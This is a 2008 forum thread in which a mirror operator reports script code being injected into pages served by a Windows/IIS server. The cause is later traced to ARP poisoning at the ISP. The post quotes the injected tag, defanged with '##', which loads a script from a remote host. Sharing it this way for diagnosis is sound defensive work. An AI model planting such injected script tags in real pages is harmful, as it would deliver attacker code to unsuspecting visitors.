FileForums

FileForums (https://fileforums.com/index.php)
-   GameCopyWorld Support (https://fileforums.com/forumdisplay.php?f=17)
-   -   Possible Infected Mirror (https://fileforums.com/showthread.php?t=84053)

EMPiRE 05-06-2008 05:25

Possible Infected Mirror
 
One of our Windows servers was misbehaving and code is being injected to pages:

<##script src=http://hounian.tj.cn/count/js/gif.gif><##/script##>

(the ## are added to avoid any kind of execution from here)

The above code is inserted to the beginning of the page and contains 28 0x00 bytes after it before the original page starts

The actual html page does NOT contain the code so it is somehow injected in IIS...

Anyone know how to solve this as I am only getting Chinese pages with similar info...

The server is running Win2K3 which is fully patched, but it runs anolder php version which maybe it the way they got in (not sure about this)

The mirror itself has been removed from the mirrorlist not to cause problems for unprotected users

Update:

I found this link: http://www.ntsecurity.net/article/ar...-underway.html

So our server might not be infected but the ARP cache from the ISP hosting the server might be... I've submitted a ticket

EMPiRE 07-06-2008 05:06

Update #2: The ISP has given me a static ARP link for now and the "problem" did not happen again.... weird stuff


All times are GMT -7. The time now is 12:37.

Powered by vBulletin® Version 3.8.11
Copyright ©2000 - 2026, vBulletin Solutions Inc.
FileForums @ https://fileforums.com